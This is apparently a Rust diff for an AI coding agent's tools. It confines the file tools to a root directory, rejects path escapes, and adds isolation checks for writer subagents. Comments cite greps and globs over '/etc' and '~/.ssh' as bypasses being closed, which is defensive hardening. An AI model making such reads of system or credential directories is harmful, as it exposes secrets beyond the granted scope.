+        let path = match &self.root {
+            Some(root) => root.resolve(
+                args.path
+                    .as_deref()
+                    .unwrap_or_else(|| root.path().to_str().unwrap_or(".")),
+            )?,
+            None => args.path.as_deref().unwrap_or(".").to_string(),
+        };
         check_perm(&self.permission, &self.ask_tx, "find_files", &args.pattern).await?;
         // Path-side check: external_directory rules + Accept-mode
         // gating live in check_perm_path. Without this find_files
         // over `/etc` skipped the rules entirely.
-        let perm_path = args.path.as_deref().unwrap_or(".");
-        check_perm_path(&self.permission, &self.ask_tx, "find_files", perm_path).await?;
+        check_perm_path(&self.permission, &self.ask_tx, "find_files", &path).await?;
 
         // LOOP-3: dir stamp catches file add/remove/rename.
-        let stamp =
-            crate::agent::tools::cache::fs_stamp_or_cwd(args.path.as_deref().unwrap_or("."));
+        let stamp = crate::agent::tools::cache::fs_stamp_or_cwd(&path);
         let cache_key = format!(
             "find_files:{}:{}:hidden={}:{}",
-            args.pattern,
-            args.path.as_deref().unwrap_or("."),
-            args.include_hidden,
-            stamp,
+            args.pattern, path, args.include_hidden, stamp,
         );
 
         if let Some(ref cache) = self.cache
@@ -103,7 +114,7 @@ impl Tool for FindFilesTool {
         let re = Regex::new(&args.pattern)
             .map_err(|e| ToolError::Msg(format!("Invalid regex: {}", e)))?;
 
-        let search_path = args.path.as_deref().unwrap_or(".");
+        let search_path = &path;
 
         // `WalkBuilder::hidden(true)` means SKIP hidden entries.
         // Default behavior (`include_hidden = false`) hides

--- a/src/agent/tools/glob.rs
+++ b/src/agent/tools/glob.rs
@@ -6,12 +6,13 @@ use std::path::Path;
 
 use crate::agent::tools::MAX_FIND_RESULTS;
 use crate::agent::tools::cache::ToolCache;
-use crate::agent::tools::{AskSender, PermCheck, ToolError, check_perm, check_perm_path};
+use crate::agent::tools::{AskSender, PermCheck, ToolError, ToolRoot, check_perm, check_perm_path};
 
 pub struct GlobTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     pub cache: Option<ToolCache>,
+    root: Option<ToolRoot>,
 }
 
 impl GlobTool {
@@ -24,6 +25,7 @@ impl GlobTool {
             permission,
             ask_tx,
             cache: None,
+            root: None,
         }
     }
 
@@ -40,7 +42,13 @@ impl GlobTool {
             permission,
             ask_tx,
             cache: Some(cache),
+            root: None,
         }
+    }
+
+    pub fn with_root(mut self, root: ToolRoot) -> Self {
+        self.root = Some(root);
+        self
     }
 }
 
@@ -124,6 +132,14 @@ impl Tool for GlobTool {
     }
 
     async fn call(&self, args: GlobArgs) -> Result<String, ToolError> {
+        let path = match &self.root {
+            Some(root) => root.resolve(
+                args.path
+                    .as_deref()
+                    .unwrap_or_else(|| root.path().to_str().unwrap_or(".")),
+            )?,
+            None => args.path.as_deref().unwrap_or(".").to_string(),
+        };
         check_perm(
             &self.permission,
             &self.ask_tx,
@@ -134,18 +150,13 @@ impl Tool for GlobTool {
         // Path-side check: external_directory rules + Accept-mode
         // working-dir gating live in check_perm_path. Without this
         // a glob over `/etc` or `~/.ssh` skipped the rules entirely.
-        let perm_path = args.path.as_deref().unwrap_or(".");
-        check_perm_path(&self.permission, &self.ask_tx, "glob", perm_path).await?;
+        check_perm_path(&self.permission, &self.ask_tx, "glob", &path).await?;
 
         // LOOP-3: dir stamp catches file add/remove/rename.
-        let stamp =
-            crate::agent::tools::cache::fs_stamp_or_cwd(args.path.as_deref().unwrap_or("."));
+        let stamp = crate::agent::tools::cache::fs_stamp_or_cwd(&path);
         let cache_key = format!(
             "glob:{}:{}:hidden={}:{}",
-            args.pattern,
-            args.path.as_deref().unwrap_or("."),
-            args.include_hidden,
-            stamp,
+            args.pattern, path, args.include_hidden, stamp,
         );
         if let Some(ref cache) = self.cache
             && let Some(cached) = cache.get(&cache_key)
@@ -155,12 +166,7 @@ impl Tool for GlobTool {
 
         let re = glob_to_regex(&args.pattern).map_err(ToolError::Msg)?;
 
-        let root = args
-            .path
-            .as_deref()
-            .map(Path::new)
-            .filter(|p| p.is_dir())
-            .unwrap_or_else(|| Path::new("."));
+        let root = Path::new(&path);
 
         let mut matches: Vec<(String, std::path::PathBuf)> = Vec::new();
 
@@ -355,6 +361,34 @@ mod tests {
             .await
             .unwrap();
         assert_eq!(out, "");
+    }
+
+    #[tokio::test]
+    async fn rooted_glob_defaults_to_root_and_rejects_escapes() {
+        let tree = TempTree::new("rooted");
+        tree.write("inside.rs", "");
+        let root = ToolRoot::new(&tree.root).unwrap();
+        let tool = GlobTool::new(None, None).with_root(root);
+
+        let out = tool
+            .call(GlobArgs {
+                pattern: "*.rs".into(),
+                path: None,
+                include_hidden: false,
+            })
+            .await
+            .unwrap();
+        assert_eq!(out, "inside.rs");
+
+        let err = tool
+            .call(GlobArgs {
+                pattern: "*.rs".into(),
+                path: Some("..".into()),
+                include_hidden: false,
+            })
+            .await
+            .unwrap_err();
+        assert!(err.to_string().contains("path escapes ToolRoot"));
     }
 
     // Regression: mtime sort previously called metadata() on the relative path,

--- a/src/agent/tools/grep.rs
+++ b/src/agent/tools/grep.rs
@@ -6,14 +6,15 @@ use rig::tool::Tool;
 use crate::agent::agent_loop::tool_input_repair::with_contract_hint;
 use crate::agent::tools::cache::ToolCache;
 use crate::agent::tools::{
-    AskSender, GrepArgs, MAX_GREP_RESULTS, PermCheck, ToolError, check_perm, check_perm_path,
-    is_skip_dir,
+    AskSender, GrepArgs, MAX_GREP_RESULTS, PermCheck, ToolError, ToolRoot, check_perm,
+    check_perm_path, is_skip_dir,
 };
 
 pub struct GrepTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     pub cache: Option<ToolCache>,
+    root: Option<ToolRoot>,
 }
 
 impl GrepTool {
@@ -23,6 +24,7 @@ impl GrepTool {
             permission,
             ask_tx,
             cache: None,
+            root: None,
         }
     }
 
@@ -35,7 +37,13 @@ impl GrepTool {
             permission,
             ask_tx,
             cache: Some(cache),
+            root: None,
         }
+    }
+
+    pub fn with_root(mut self, root: ToolRoot) -> Self {
+        self.root = Some(root);
+        self
     }
 
     fn glob_to_regex(glob: &str) -> String {
@@ -113,14 +121,21 @@ impl Tool for GrepTool {
     }
 
     async fn call(&self, args: GrepArgs) -> Result<String, ToolError> {
+        let path = match &self.root {
+            Some(root) => root.resolve(
+                args.path
+                    .as_deref()
+                    .unwrap_or_else(|| root.path().to_str().unwrap_or(".")),
+            )?,
+            None => args.path.as_deref().unwrap_or(".").to_string(),
+        };
         check_perm(&self.permission, &self.ask_tx, "grep", &args.pattern).await?;
         // Path-side check: previously grep accepted any path
         // (`grep("x", "/etc")`) because only the pattern was
         // permission-checked. external_directory rules + the
         // working-dir Accept-mode logic live in check_perm_path,
         // so an extra call here closes the bypass.
-        let perm_path = args.path.as_deref().unwrap_or(".");
-        check_perm_path(&self.permission, &self.ask_tx, "grep", perm_path).await?;
+        check_perm_path(&self.permission, &self.ask_tx, "grep", &path).await?;
 
         // LOOP-3: include dir stamp so external file additions /
         // mtime changes within the search root invalidate the
@@ -129,12 +144,11 @@ impl Tool for GrepTool {
         // filesystem), so the cache may still go stale for in-
         // place edits within the dir — but the common case
         // (file add/remove/rename) is caught.
-        let stamp =
-            crate::agent::tools::cache::fs_stamp_or_cwd(args.path.as_deref().unwrap_or("."));
+        let stamp = crate::agent::tools::cache::fs_stamp_or_cwd(&path);
         let cache_key = format!(
             "grep:{}:{}:{}:{}:hidden={}:{}",
             args.pattern,
-            args.path.as_deref().unwrap_or("."),
+            path,
             args.include.as_deref().unwrap_or(""),
             args.context_lines.unwrap_or(0),
             args.include_hidden,
@@ -150,7 +164,7 @@ impl Tool for GrepTool {
         let re = Regex::new(&args.pattern)
             .map_err(|e| ToolError::Msg(format!("Invalid regex pattern: {}", e)))?;
 
-        let search_path = args.path.as_deref().unwrap_or(".");
+        let search_path = &path;
         let context = args.context_lines.unwrap_or(0);
 
         // Validate the include glob and surface compile errors

--- a/src/agent/tools/list_dir.rs
+++ b/src/agent/tools/list_dir.rs
@@ -7,7 +7,7 @@ use rig::tool::Tool;
 use crate::agent::agent_loop::tool_input_repair::with_contract_hint;
 use crate::agent::tools::cache::ToolCache;
 use crate::agent::tools::{
-    AskSender, ListDirArgs, PermCheck, ToolError, check_perm_path, is_skip_dir,
+    AskSender, ListDirArgs, PermCheck, ToolError, ToolRoot, check_perm_path, is_skip_dir,
 };
 
 fn format_size(bytes: u64) -> String {
@@ -35,6 +35,7 @@ pub struct ListDirTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     pub cache: Option<ToolCache>,
+    root: Option<ToolRoot>,
 }
 
 impl ListDirTool {
@@ -44,6 +45,7 @@ impl ListDirTool {
             permission,
             ask_tx,
             cache: None,
+            root: None,
         }
     }
 
@@ -56,7 +58,13 @@ impl ListDirTool {
             permission,
             ask_tx,
             cache: Some(cache),
+            root: None,
         }
+    }
+
+    pub fn with_root(mut self, root: ToolRoot) -> Self {
+        self.root = Some(root);
+        self
     }
 }
 
@@ -92,11 +100,18 @@ impl Tool for ListDirTool {
     }
 
     async fn call(&self, args: ListDirArgs) -> Result<String, ToolError> {
-        let path = args.path.as_deref().unwrap_or(".");
-        check_perm_path(&self.permission, &self.ask_tx, "list_dir", path).await?;
+        let path = match &self.root {
+            Some(root) => root.resolve(
+                args.path
+                    .as_deref()
+                    .unwrap_or_else(|| root.path().to_str().unwrap_or(".")),
+            )?,
+            None => args.path.as_deref().unwrap_or(".").to_string(),
+        };
+        check_perm_path(&self.permission, &self.ask_tx, "list_dir", &path).await?;
 
         // LOOP-3: dir stamp invalidates the cache on external mtime changes.
-        let stamp = crate::agent::tools::cache::fs_stamp_or_cwd(path);
+        let stamp = crate::agent::tools::cache::fs_stamp_or_cwd(&path);
         let cache_key = format!("list_dir:{}:hidden={}:{}", path, args.include_hidden, stamp,);
 
         if let Some(ref cache) = self.cache

--- a/src/agent/tools/mod.rs
+++ b/src/agent/tools/mod.rs
@@ -82,9 +82,100 @@ pub use webfetch::WebFetchTool;
 pub use websearch::WebSearchTool;
 pub use write::WriteTool;
 
+/// Canonical filesystem boundary for a set of rooted tools.
+///
+/// A root must exist when it is configured; targets may not, provided their
+/// nearest existing ancestor remains inside this root.
+#[derive(Clone, Debug)]
+pub struct ToolRoot(PathBuf);
+
+impl ToolRoot {
+    pub fn new(path: impl AsRef<Path>) -> Result<Self, ToolError> {
+        let root = std::fs::canonicalize(path.as_ref()).map_err(ToolError::from)?;
+        if !root.is_dir() {
+            return Err(ToolError::Msg(format!(
+                "ToolRoot is not a directory: {}",
+                root.display()
+            )));
+        }
+        Ok(Self(root))
+    }
+
+    pub fn path(&self) -> &Path {
+        &self.0
+    }
+
+    /// Resolve `path` beneath this root, following existing symlinks and
+    /// allowing a missing suffix only below an in-root existing ancestor.
+    pub fn resolve(&self, path: &str) -> Result<String, ToolError> {
+        let input = Path::new(path);
+        let joined = if input.is_absolute() {
+            input.to_path_buf()
+        } else {
+            self.0.join(input)
+        };
+        let normalized = normalize_path(&joined)?;
+        let mut ancestor = normalized.as_path();
+        while !ancestor.exists() {
+            ancestor = ancestor
+                .parent()
+                .ok_or_else(|| ToolError::Msg(format!("path escapes ToolRoot: {path}")))?;
+        }
+        let canonical_ancestor = std::fs::canonicalize(ancestor)?;
+        if !canonical_ancestor.starts_with(&self.0) {
+            return Err(ToolError::Msg(format!("path escapes ToolRoot: {path}")));
+        }
+        let suffix = normalized
+            .strip_prefix(ancestor)
+            .map_err(|_| ToolError::Msg(format!("path escapes ToolRoot: {path}")))?;
+        Ok(canonical_ancestor
+            .join(suffix)
+            .to_string_lossy()
+            .into_owned())
+    }
+}
+
+fn normalize_path(path: &Path) -> Result<PathBuf, ToolError> {
+    let mut out = PathBuf::new();
+    for component in path.components() {
+        match component {
+            Component::Prefix(prefix) => out.push(prefix.as_os_str()),
+            Component::RootDir => out.push(component.as_os_str()),
+            Component::CurDir => {}
+            Component::Normal(part) => out.push(part),
+            Component::ParentDir => {
+                if !out.pop() {
+                    return Err(ToolError::Msg(format!(
+                        "path escapes ToolRoot: {}",
+                        path.display()
+                    )));
+                }
+            }
+        }
+    }
+    Ok(out)
+}
+
+/// Resolve a path for an optionally rooted tool. Rootless tools preserve their
+/// historical absolute-path contract.
+pub fn resolve_tool_path(
+    root: Option<&ToolRoot>,
+    path: &str,
+    subject: &str,
+) -> Result<String, ToolError> {
+    match root {
+        Some(root) => root.resolve(path),
+        None => {
+            require_absolute_path(path, subject).map_err(ToolError::Msg)?;
+            Ok(path.to_string())
+        }
+    }
+}
+
 #[allow(unused_imports)]
 use crate::sync_util::LockExt;
 use std::io;
+use std::path::{Component, Path, PathBuf};
 
 use serde::Deserialize;
 
@@ -725,6 +816,20 @@ pub async fn check_perm_path_resolve(
     path: &str,
 ) -> Result<String, ToolError> {
     enforce(permission, ask_tx, tool, Scope::PathResolve(path)).await
+}
+
+/// Rooted path-tool preamble. Confinement always happens before permission
+/// checks, so an allow rule cannot authorize an escape.
+pub async fn require_and_resolve_rooted(
+    root: Option<&ToolRoot>,
+    permission: &Option<PermCheck>,
+    ask_tx: &Option<AskSender>,
+    tool: &str,
+    path: &str,
+    subject: &str,
+) -> Result<String, ToolError> {
+    let path = resolve_tool_path(root, path, subject)?;
+    check_perm_path_resolve(permission, ask_tx, tool, &path).await
 }
 
 /// The path-tool call preamble, in one place: require `path` be absolute, then

--- a/src/agent/tools/read.rs
+++ b/src/agent/tools/read.rs
@@ -7,7 +7,9 @@ use rig::tool::Tool;
 use crate::agent::agent_loop::tool_input_repair::with_contract_hint;
 use crate::agent::agent_loop::types::InjectionScanMode;
 use crate::agent::tools::cache::ToolCache;
-use crate::agent::tools::{AskSender, PermCheck, ReadArgs, ToolError, require_and_resolve};
+use crate::agent::tools::{
+    AskSender, PermCheck, ReadArgs, ToolError, ToolRoot, require_and_resolve_rooted,
+};
 use crate::extras::content_guard::guard_untrusted_result;
 #[cfg(feature = "lsp")]
 use crate::lsp::manager::{LspManager, TouchMode};
@@ -98,6 +100,7 @@ pub struct ReadTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     pub cache: Option<ToolCache>,
+    root: Option<ToolRoot>,
     /// When set, the tool fires off a `touch_file` to warm the LSP server
     /// so subsequent edits surface diagnostics quickly. Fire-and-forget:
     /// the read tool does not wait or surface diagnostics in its output.
@@ -114,6 +117,7 @@ impl ReadTool {
             permission,
             ask_tx,
             cache: None,
+            root: None,
             #[cfg(feature = "lsp")]
             lsp_manager: None,
             injection_scan_mode: InjectionScanMode::default(),
@@ -130,10 +134,16 @@ impl ReadTool {
             permission,
             ask_tx,
             cache: Some(cache),
+            root: None,
             #[cfg(feature = "lsp")]
             lsp_manager,
             injection_scan_mode: InjectionScanMode::default(),
         }
+    }
+
+    pub fn rooted(mut self, root: ToolRoot) -> Self {
+        self.root = Some(root);
+        self
     }
 
     /// Set the injection scan mode (dirge-5ig9). Chain after construction.
@@ -198,7 +208,8 @@ impl Tool for ReadTool {
         // same canonical form the permission check ran against, so a symlink
         // swap between check and open can't land us on a different file than
         // the user authorized.
-        let resolved_path = require_and_resolve(
+        let resolved_path = require_and_resolve_rooted(
+            self.root.as_ref(),
             &self.permission,
             &self.ask_tx,
             "read",

--- a/src/agent/tools/repo_overview.rs
+++ b/src/agent/tools/repo_overview.rs
@@ -6,7 +6,7 @@ use rig::tool::Tool;
 use serde::Deserialize;
 
 use crate::agent::tools::cache::ToolCache;
-use crate::agent::tools::{AskSender, PermCheck, ToolError, check_perm_path};
+use crate::agent::tools::{AskSender, PermCheck, ToolError, ToolRoot, check_perm_path};
 
 /// Maximum repo_overview tree nodes (dirs + files) emitted. Bound so
 /// a sprawling monorepo doesn't dump a 50 000-line tree at the LLM.
@@ -38,6 +38,7 @@ pub struct RepoOverviewTool {
     pub permission: Option<PermCheck>,
     pub ask_tx: Option<AskSender>,
     cache: Option<ToolCache>,
+    root: Option<ToolRoot>,
 }
 
 impl RepoOverviewTool {
@@ -47,6 +48,7 @@ impl RepoOverviewTool {
             permission,
             ask_tx,
             cache: None,
+            root: None,
         }
     }
 
@@ -59,7 +61,13 @@ impl RepoOverviewTool {
             permission,
             ask_tx,
             cache: Some(cache),
+            root: None,
         }
+    }
+
+    pub fn with_root(mut self, root: ToolRoot) -> Self {
+        self.root = Some(root);
+        self
     }
 }
 
@@ -96,8 +104,15 @@ impl Tool for RepoOverviewTool {
     }
 
     async fn call(&self, args: RepoOverviewArgs) -> Result<String, ToolError> {
-        let path = args.path.as_deref().unwrap_or(".");
-        check_perm_path(&self.permission, &self.ask_tx, "repo_overview", path).await?;
+        let path = match &self.root {
+            Some(root) => root.resolve(
+                args.path
+                    .as_deref()
+                    .unwrap_or_else(|| root.path().to_str().unwrap_or(".")),
+            )?,
+            None => args.path.as_deref().unwrap_or(".").to_string(),
+        };
+        check_perm_path(&self.permission, &self.ask_tx, "repo_overview", &path).await?;
 
         let depth = args
             .max_depth
@@ -106,7 +121,7 @@ impl Tool for RepoOverviewTool {
         let want_lines = args.include_line_counts.unwrap_or(false);
 
         // LOOP-3: include root-dir stamp so external edits invalidate.
-        let stamp = crate::agent::tools::cache::fs_stamp_or_cwd(path);
+        let stamp = crate::agent::tools::cache::fs_stamp_or_cwd(&path);
         let cache_key = format!("repo_overview:{}:{}:{}:{}", path, depth, want_lines, stamp,);
         if let Some(ref cache) = self.cache
             && let Some(cached) = cache.get(&cache_key)
@@ -114,7 +129,7 @@ impl Tool for RepoOverviewTool {
             return Ok(cached);
         }
 
-        let root = PathBuf::from(path);
+        let root = PathBuf::from(&path);
         if !root.exists() {
             return Err(ToolError::Msg(format!("path does not exist: {}", path)));
         }

--- a/src/agent/tools/task.rs
+++ b/src/agent/tools/task.rs
@@ -40,6 +40,7 @@ fn writer_worktree_enabled(
     is_writer: bool,
     isolation: SubagentWriteIsolation,
     is_microvm: bool,
+    sandbox_confines_writes: bool,
 ) -> Result<bool, &'static str> {
     if !is_writer || isolation == SubagentWriteIsolation::Serialize {
         return Ok(false);
@@ -53,7 +54,27 @@ fn writer_worktree_enabled(
             SubagentWriteIsolation::Serialize => Ok(false),
         };
     }
+    if !sandbox_confines_writes {
+        return match isolation {
+            SubagentWriteIsolation::Worktree => Err(
+                "worktree write isolation requires a confining sandbox; run dirge with a Linux bwrap sandbox, or the writer's shell could escape the worktree",
+            ),
+            SubagentWriteIsolation::Auto => Ok(false),
+            SubagentWriteIsolation::Serialize => unreachable!(),
+        };
+    }
     Ok(true)
+}
+
+/// Check whether the process's current directory (the parent checkout)
+/// is dirty. Returns `Err` when we're not in a git repo at all — the
+/// caller should treat that as "no uncommitted work to clobber."
+fn current_repo_is_dirty() -> Result<bool, String> {
+    let repo = std::env::current_dir()
+        .map_err(|e| format!("failed to resolve current directory: {e}"))?
+        .canonicalize()
+        .map_err(|e| format!("failed to canonicalize repository: {e}"))?;
+    crate::extras::git_worktree::repo_is_dirty(&repo)
 }
 
 #[cfg(feature = "git-worktree")]
@@ -849,6 +870,7 @@ impl TaskTool {
                     is_writer,
                     self.write_isolation,
                     self.sandbox.is_microvm(),
+                    self.sandbox.confines_writes(),
                 )
                 .map_err(|error| ToolError::Msg(error.to_string()))?;
             if coordinator_dispatch {
@@ -951,6 +973,28 @@ impl TaskTool {
                 } else {
                     None
                 };
+            // A read-write subagent without worktree isolation runs in the
+            // parent checkout. Refuse to do this when the parent is dirty —
+            // the writer's edits and `git add -A` + `git commit` would
+            // clobber uncommitted work (data loss). This fires for BOTH the
+            // attempts_isolated_writer=false path AND the auto-fallback after
+            // a failed worktree creation.
+            if is_writer && rooted_worktree.is_none() {
+                match current_repo_is_dirty() {
+                    Ok(true) => {
+                        let error = "cannot run a read-write subagent in a dirty parent \
+                                     checkout without worktree isolation — commit or \
+                                     stash your changes, or run under a Linux bwrap \
+                                     sandbox for isolated worktrees"
+                            .to_string();
+                        self.bg_store
+                            .notify(&task_id, TaskState::Failed(error.clone()));
+                        return Err(ToolError::Msg(error));
+                    }
+                    Ok(false) => { /* clean — safe to proceed */ }
+                    Err(_) => { /* not a git repo — no uncommitted work to clobber */ }
+                }
+            }
             self.bg_store.notify_started(&task_id);
             self.emit_chat(SubagentChatEvent::Spawn {
                 id: task_id.clone(),
@@ -1698,23 +1742,44 @@ mod tests {
 
     #[test]
     fn writer_worktree_policy_respects_mode_and_sandbox() {
+        // Non-writer: always false regardless of isolation/sandbox.
         assert_eq!(
-            writer_worktree_enabled(false, SubagentWriteIsolation::Worktree, false),
+            writer_worktree_enabled(false, SubagentWriteIsolation::Worktree, false, false),
             Ok(false)
         );
+        // Serialize: always false.
         assert_eq!(
-            writer_worktree_enabled(true, SubagentWriteIsolation::Serialize, false),
+            writer_worktree_enabled(true, SubagentWriteIsolation::Serialize, false, false),
             Ok(false)
         );
+        // Writer + Auto + confining sandbox → worktree allowed.
         assert_eq!(
-            writer_worktree_enabled(true, SubagentWriteIsolation::Auto, false),
+            writer_worktree_enabled(true, SubagentWriteIsolation::Auto, false, true),
             Ok(true)
         );
+        // Writer + Auto + no confining sandbox (Off) → worktree disabled,
+        // fall back to serialized parent (safe when parent is clean).
         assert_eq!(
-            writer_worktree_enabled(true, SubagentWriteIsolation::Auto, true),
+            writer_worktree_enabled(true, SubagentWriteIsolation::Auto, false, false),
             Ok(false)
         );
-        assert!(writer_worktree_enabled(true, SubagentWriteIsolation::Worktree, true).is_err());
+        // Writer + Worktree + no confining sandbox → error (false isolation).
+        assert!(
+            writer_worktree_enabled(true, SubagentWriteIsolation::Worktree, false, false).is_err()
+        );
+        // Writer + Worktree + confining sandbox → allowed.
+        assert_eq!(
+            writer_worktree_enabled(true, SubagentWriteIsolation::Worktree, false, true),
+            Ok(true)
+        );
+        // MicroVM: Auto → false, Worktree → error (unchanged).
+        assert_eq!(
+            writer_worktree_enabled(true, SubagentWriteIsolation::Auto, true, true),
+            Ok(false)
+        );
+        assert!(
+            writer_worktree_enabled(true, SubagentWriteIsolation::Worktree, true, true).is_err()
+        );
     }
 
     #[test]

--- a/src/agent/tools/task.rs
+++ b/src/agent/tools/task.rs
@@ -20,7 +20,47 @@ use uuid::Uuid;
 use crate::agent::agent_loop::tool::AbortSignal;
 use crate::agent::tools::background::{BackgroundStore, TaskState};
 use crate::agent::tools::{AskSender, PermCheck, ToolError, check_perm};
+use crate::config::SubagentWriteIsolation;
 use crate::provider::AnyModel;
+use crate::sandbox::Sandbox;
+
+fn writer_worktree_enabled(
+    is_writer: bool,
+    isolation: SubagentWriteIsolation,
+    is_microvm: bool,
+) -> Result<bool, &'static str> {
+    if !is_writer || isolation == SubagentWriteIsolation::Serialize {
+        return Ok(false);
+    }
+    if is_microvm {
+        return match isolation {
+            SubagentWriteIsolation::Worktree => {
+                Err("worktree write isolation is unavailable in microVM sandbox mode")
+            }
+            SubagentWriteIsolation::Auto => Ok(false),
+            SubagentWriteIsolation::Serialize => Ok(false),
+        };
+    }
+    Ok(true)
+}
+
+#[cfg(feature = "git-worktree")]
+fn create_writer_worktree(
+    task_id: &str,
+) -> Result<crate::extras::git_worktree::WorktreeInfo, String> {
+    let repo = std::env::current_dir()
+        .map_err(|e| format!("failed to resolve current directory: {e}"))?
+        .canonicalize()
+        .map_err(|e| format!("failed to canonicalize current repository: {e}"))?;
+    if crate::extras::git_worktree::repo_is_dirty(&repo)? {
+        return Err("current repository has uncommitted changes".to_string());
+    }
+    let parent = repo
+        .parent()
+        .ok_or_else(|| "current repository has no parent directory".to_string())?;
+    let name = format!("dirge-task-{task_id}");
+    crate::extras::git_worktree::create_at(&repo, parent, &name, &name)
+}
 
 /// dirge-ov2 Phase D: subagent chat-window event. Sent by `TaskTool`
 /// when it spawns / completes a subagent so the UI loop can surface
@@ -342,6 +382,26 @@ pub fn resolve_subagent_max_turns(p: &crate::context::agent_defs::SubagentToolPo
     p.max_turns.unwrap_or(SUBAGENT_DEFAULT_MAX_TURNS)
 }
 
+/// Per-subagent timeout honoring profile configuration, clamped to a bounded
+/// interval so a typo cannot create either immediate failures or stuck tasks.
+pub fn resolve_subagent_timeout(
+    p: &crate::context::agent_defs::SubagentToolPolicy,
+) -> std::time::Duration {
+    const DEFAULT_SECS: u64 = 600;
+    const MIN_SECS: u64 = 30;
+    const MAX_SECS: u64 = 3600;
+    let raw = p.timeout_secs.unwrap_or(DEFAULT_SECS);
+    let secs = raw.clamp(MIN_SECS, MAX_SECS);
+    if secs != raw {
+        tracing::warn!(
+            timeout_secs = raw,
+            resolved_timeout_secs = secs,
+            "subagent timeout is outside the supported range; clamping"
+        );
+    }
+    std::time::Duration::from_secs(secs)
+}
+
 /// dirge-ykeu Phase 4: a pre-resolved subagent routing for one agent profile.
 /// Built once at startup (in `main`, where the client + config + registry are
 /// all available) so `TaskTool` needs neither the client nor the config to
@@ -361,6 +421,44 @@ pub struct SubagentRoute {
     /// Per-subagent turn cap. Honors a profile `subagent.max_turns` override
     /// else [`SUBAGENT_DEFAULT_MAX_TURNS`]. Only consumed on the tooled path.
     pub max_turns: usize,
+    pub timeout: std::time::Duration,
+    pub tier: crate::context::agent_defs::SubagentToolTier,
+}
+
+#[derive(Debug, Clone)]
+pub struct CoordinatorProfile {
+    pub name: String,
+    pub description: Option<String>,
+    pub tier: crate::context::agent_defs::SubagentToolTier,
+}
+
+#[derive(Debug, Clone, Default)]
+pub struct CoordinatorProfiles {
+    pub readonly: Vec<CoordinatorProfile>,
+    pub readwrite: Vec<CoordinatorProfile>,
+}
+
+pub fn resolve_coordinator_profiles(
+    agent_defs: &crate::context::agent_defs::AgentRegistry,
+) -> CoordinatorProfiles {
+    let mut profiles = CoordinatorProfiles::default();
+    for definition in agent_defs.iter() {
+        let profile = CoordinatorProfile {
+            name: definition.name.clone(),
+            description: definition.description.clone(),
+            tier: definition.subagent.tier.clone(),
+        };
+        match &profile.tier {
+            crate::context::agent_defs::SubagentToolTier::Readonly => {
+                profiles.readonly.push(profile)
+            }
+            crate::context::agent_defs::SubagentToolTier::ReadWrite => {
+                profiles.readwrite.push(profile)
+            }
+            crate::context::agent_defs::SubagentToolTier::Toolless => {}
+        }
+    }
+    profiles
 }
 
 /// Process-global map of profile name → routing. Set once at interactive
@@ -585,6 +683,8 @@ pub struct TaskTool {
     pub ask_tx: Option<AskSender>,
     model: AnyModel,
     bg_store: BackgroundStore,
+    sandbox: Sandbox,
+    write_isolation: SubagentWriteIsolation,
     /// dirge-ov2: send-side of the subagent-chat-event channel.
     /// `Option` so `--no-tools` paths / tests can omit the UI sink
     /// without forcing every TaskTool builder to manufacture one.
@@ -597,12 +697,16 @@ impl TaskTool {
         ask_tx: Option<AskSender>,
         model: AnyModel,
         bg_store: BackgroundStore,
+        sandbox: Sandbox,
+        write_isolation: SubagentWriteIsolation,
     ) -> Self {
         Self {
             permission,
             ask_tx,
             model,
             bg_store,
+            sandbox,
+            write_isolation,
             chat_sink: None,
         }
     }
@@ -650,7 +754,10 @@ impl TaskTool {
         route_preamble: Option<String>,
         allowed: Vec<String>,
         max_turns: usize,
+        timeout: std::time::Duration,
         background: bool,
+        is_writer: bool,
+        retry_of: Option<String>,
         prompt: String,
         agent_name: Option<String>,
     ) -> Result<String, ToolError> {
@@ -674,7 +781,79 @@ impl TaskTool {
                 )));
             }
             let task_id = Uuid::new_v4().to_string();
-            self.bg_store.insert(task_id.clone());
+            let coordinator_dispatch = self.bg_store.coordinator_strategy().is_some();
+            if coordinator_dispatch {
+                self.bg_store
+                    .insert_coordinator_dispatch(
+                        task_id.clone(),
+                        prompt.clone(),
+                        is_writer,
+                        retry_of.as_deref(),
+                    )
+                    .map_err(ToolError::Msg)?;
+            } else {
+                self.bg_store.insert_for_dispatch(task_id.clone());
+            }
+
+            // Coordinator ReadWrite agents may be rooted in a dedicated
+            // worktree. Auto preserves serialization when any prerequisite is
+            // unavailable; explicit Worktree reports that failure.
+            let rooted_worktree = if coordinator_dispatch {
+                match writer_worktree_enabled(
+                    is_writer,
+                    self.write_isolation,
+                    self.sandbox.is_microvm(),
+                ) {
+                    Ok(false) => None,
+                    Ok(true) => {
+                        #[cfg(feature = "git-worktree")]
+                        match create_writer_worktree(&task_id) {
+                            Ok(info) => {
+                                let main_git_dir = info.main_repo_path.join(".git");
+                                if let Err(error) = self.bg_store.set_coordinator_dispatch_worktree(
+                                    &task_id,
+                                    info.branch,
+                                    info.worktree_path.display().to_string(),
+                                ) {
+                                    self.bg_store
+                                        .notify(&task_id, TaskState::Failed(error.clone()));
+                                    return Err(ToolError::Msg(error));
+                                }
+                                Some((info.worktree_path, main_git_dir))
+                            }
+                            Err(error) if self.write_isolation == SubagentWriteIsolation::Auto => {
+                                None
+                            }
+                            Err(error) => {
+                                self.bg_store
+                                    .notify(&task_id, TaskState::Failed(error.clone()));
+                                return Err(ToolError::Msg(error));
+                            }
+                        }
+                        #[cfg(not(feature = "git-worktree"))]
+                        {
+                            if self.write_isolation == SubagentWriteIsolation::Auto {
+                                None
+                            } else {
+                                let error =
+                                    "worktree write isolation requires the git-worktree feature"
+                                        .to_string();
+                                self.bg_store
+                                    .notify(&task_id, TaskState::Failed(error.clone()));
+                                return Err(ToolError::Msg(error));
+                            }
+                        }
+                    }
+                    Err(error) => {
+                        let error = error.to_string();
+                        self.bg_store
+                            .notify(&task_id, TaskState::Failed(error.clone()));
+                        return Err(ToolError::Msg(error));
+                    }
+                }
+            } else {
+                None
+            };
             self.bg_store.notify_started(&task_id);
             self.emit_chat(SubagentChatEvent::Spawn {
                 id: task_id.clone(),
@@ -691,8 +870,12 @@ impl TaskTool {
             let allowed_for_task = allowed.clone();
             let model_for_task = route_model.clone();
             let abort_for_task = abort.clone();
+            let permission_for_task = self.permission.clone();
+            let ask_tx_for_task = self.ask_tx.clone();
+            let sandbox_for_task = self.sandbox.clone();
